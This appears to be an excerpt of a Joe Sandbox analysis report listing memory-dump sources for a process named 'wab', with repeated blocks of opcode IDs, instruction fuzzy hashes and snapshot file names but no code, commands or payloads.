                                                  • Opcode ID: 01e1305c3b8b40173d1b6f416e271c297ab33cc9cb4344b92170da6161d0e64f
                                                  • Instruction ID: 88f078dc538ee16b5260689e1243b5582365962f953cca919b3032b5ddb9a3fb
                                                  • Opcode Fuzzy Hash: 01e1305c3b8b40173d1b6f416e271c297ab33cc9cb4344b92170da6161d0e64f
                                                  • Instruction Fuzzy Hash: B5529A74A01228CFDB64DF69C984B9DBBB2BF89300F1085E9D809A7355DB34AE81DF51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce8893cf5fedac6e6e191e520043abc67df66d36679a09c814091cce41029109
                                                  • Instruction ID: 19bfbaddfe201a094082f29fe2d4ae1d73238734a7ef7e2aabed756f3671e4ff
                                                  • Opcode Fuzzy Hash: ce8893cf5fedac6e6e191e520043abc67df66d36679a09c814091cce41029109
                                                  • Instruction Fuzzy Hash: 0D72BC74E012298FEB65DF69C980BDDBBF2BB49304F2485E9D408A7255DB34AE81CF41
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b08021fcee4b3f6ff56356a04df88141eb68b1aebb1c6315be8b5a2a706944d8
                                                  • Instruction ID: b227d0fddeb1b0f3bcdd485d488ea52cabcc750b11c59c037576e661485cfab9
                                                  • Opcode Fuzzy Hash: b08021fcee4b3f6ff56356a04df88141eb68b1aebb1c6315be8b5a2a706944d8
                                                  • Instruction Fuzzy Hash: 43C1A074E01218CFDB54DFA5C944BADBBB2BF89300F2080A9D808AB365DB359E85DF51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e738ff4f708261b9b62855b82572b4cb839ff99294971c836e558494b9255225
                                                  • Instruction ID: 4aa40b94d6a7d668743929bc1c9b0d2e05630edf914f338be3386121c06e3695
                                                  • Opcode Fuzzy Hash: e738ff4f708261b9b62855b82572b4cb839ff99294971c836e558494b9255225
                                                  • Instruction Fuzzy Hash: 5DC1A174E01218CFDB54DFA5C944BADBBB2BF88300F2081A9D808AB369DB355E85DF51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4c3cf1a8e115660f0a9349af9ccdfbea10095c7db80112fa0d3823868e47e5d4
                                                  • Instruction ID: 9a451847f09bbfc9f8bfc8a1d6d7fe0391a2c120825333545de43e7b5434ec28
                                                  • Opcode Fuzzy Hash: 4c3cf1a8e115660f0a9349af9ccdfbea10095c7db80112fa0d3823868e47e5d4
                                                  • Instruction Fuzzy Hash: BAC1A174E01218CFDB54DFA5C944BADBBB2BF88300F2084A9D808AB365DB359E85DF51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 84b83f5c8e8455ee3922678f69785c656ac690edf54c97b92a3a5c20f1a156dd
                                                  • Instruction ID: b8af1e254d6b29881b8c14cc8fd038ab888808a1d878bb59b6930bcdb6c721fd
                                                  • Opcode Fuzzy Hash: 84b83f5c8e8455ee3922678f69785c656ac690edf54c97b92a3a5c20f1a156dd
                                                  • Instruction Fuzzy Hash: 9DC1A174E01218CFDB54DFA5C944B9DBBB2BF89300F2081A9D809AB369DB359E85CF51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d3f5a37cdabab1bbcc17b0653c76ea1f6cdb104b94fd760b6dffde2cb535e477
                                                  • Instruction ID: 346a5efa59a3e9c69c2b2238f89d2eeee8e8c435261571344818ec7b46d88889
                                                  • Opcode Fuzzy Hash: d3f5a37cdabab1bbcc17b0653c76ea1f6cdb104b94fd760b6dffde2cb535e477
                                                  • Instruction Fuzzy Hash: E9C1A074E01218CFDB54DFA5C944B9DBBB2BF89300F2084A9D809AB369DB359E85CF51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 31fdbe119f844f2e1f4794afc55efe219d6497d1c99aba09a000376a188005ac
                                                  • Instruction ID: d2372efdbbf9ced67c777f0c42e485ca501f268802a901683579af0d0437ddf6
                                                  • Opcode Fuzzy Hash: 31fdbe119f844f2e1f4794afc55efe219d6497d1c99aba09a000376a188005ac
                                                  • Instruction Fuzzy Hash: 48C1A074E01218CFDB54DFA5C944BADBBB2BF88300F2081A9D809AB365DB359E85CF51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2b08a1b10bfc1ee2964844cf733f2c38db5e81861e61906aea80db4b1f700aff
                                                  • Instruction ID: 80f648c64001e7f71eeae31fd859cd0dea540831256b11ee525c69ed9b8cd5f5
                                                  • Opcode Fuzzy Hash: 2b08a1b10bfc1ee2964844cf733f2c38db5e81861e61906aea80db4b1f700aff
                                                  • Instruction Fuzzy Hash: DFC1A074E01218CFDB54DFA5C944B9DBBB2BF88300F2085A9D809AB369DB359E85CF51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f8b9a586cff6330b12cb3fdbe9b162a43d741186ce00ecfcb55ffd2f3002b7b8
                                                  • Instruction ID: fdfc1c8c876e6845c86a8eb958b3496dbff3ab3cde53af9c4d711234c33fd4a6
                                                  • Opcode Fuzzy Hash: f8b9a586cff6330b12cb3fdbe9b162a43d741186ce00ecfcb55ffd2f3002b7b8
                                                  • Instruction Fuzzy Hash: EAC1AF74E01218CFDB54DFA5C944B9DBBB2BF88300F2085A9D809AB369DB359E85CF51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3d083f739048833e1e89a393979701897d0cd41abeb724d0c696bd8e6232eb6f
                                                  • Instruction ID: 9031904ed0f64f8397f1ae425685fe451e3f4d3cc3b3bfdeb124752472f7b70e
                                                  • Opcode Fuzzy Hash: 3d083f739048833e1e89a393979701897d0cd41abeb724d0c696bd8e6232eb6f
                                                  • Instruction Fuzzy Hash: 50C1A174E01218CFDB54DFA5C944B9DBBB2BF88300F2080A9D809AB369DB359E85CF51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1a4b7f5f0c6e2d8889871bf7050e359c0be3509f16b035234f78bc1949d124d9
                                                  • Instruction ID: 114ae105777a65c6964f4ec8783092f2ed2a0ddb6e8b3aeb8fd9bb0fab75468f
                                                  • Opcode Fuzzy Hash: 1a4b7f5f0c6e2d8889871bf7050e359c0be3509f16b035234f78bc1949d124d9
                                                  • Instruction Fuzzy Hash: DBC1B074E01218CFDB54DFA5C944B9DBBB2BF89300F2080A9D808AB369DB359E85DF51
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3307348599.0000000024490000.00000040.00000800.00020000.00000000.sdmp, Offset: 24490000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_24490000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d9370ff3fcb035c70d5902eeddb0508f9a955f06bcde6018126d8dffc0a1c564
                                                  • Instruction ID: 72cd0eb20aea0d191da75f3ffbe07bd19a1849f612c4b6f0c197cfed304fee19
                                                  • Opcode Fuzzy Hash: d9370ff3fcb035c70d5902eeddb0508f9a955f06bcde6018126d8dffc0a1c564
                                                  • Instruction Fuzzy Hash: D1C19F74E01218CFDB54DFA5C944B9DBBB2BF89300F2084A9D809AB369DB359E85CF51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.3274109949.00000000028B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_28b0000_wab.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: \;]q$\;]q$\;]q$\;]q
                                                  • API String ID: 0-2351511683
                                                  • Opcode ID: 247c74308f1a32c659f2e328d0dfdc47c1446f98b6d0f0b9921bc774ab8d7fe0
                                                  • Instruction ID: 737f11a491d6ee6d5c144b54e82a4d87ebde1afd24d9bb4e730645ecc3524137
                                                  • Opcode Fuzzy Hash: 247c74308f1a32c659f2e328d0dfdc47c1446f98b6d0f0b9921bc774ab8d7fe0
                                                  • Instruction Fuzzy Hash: 03019A3D7402298F872D8E2CC580AA537EEAF8CA66725446EE449CB3B4EA21EC41C740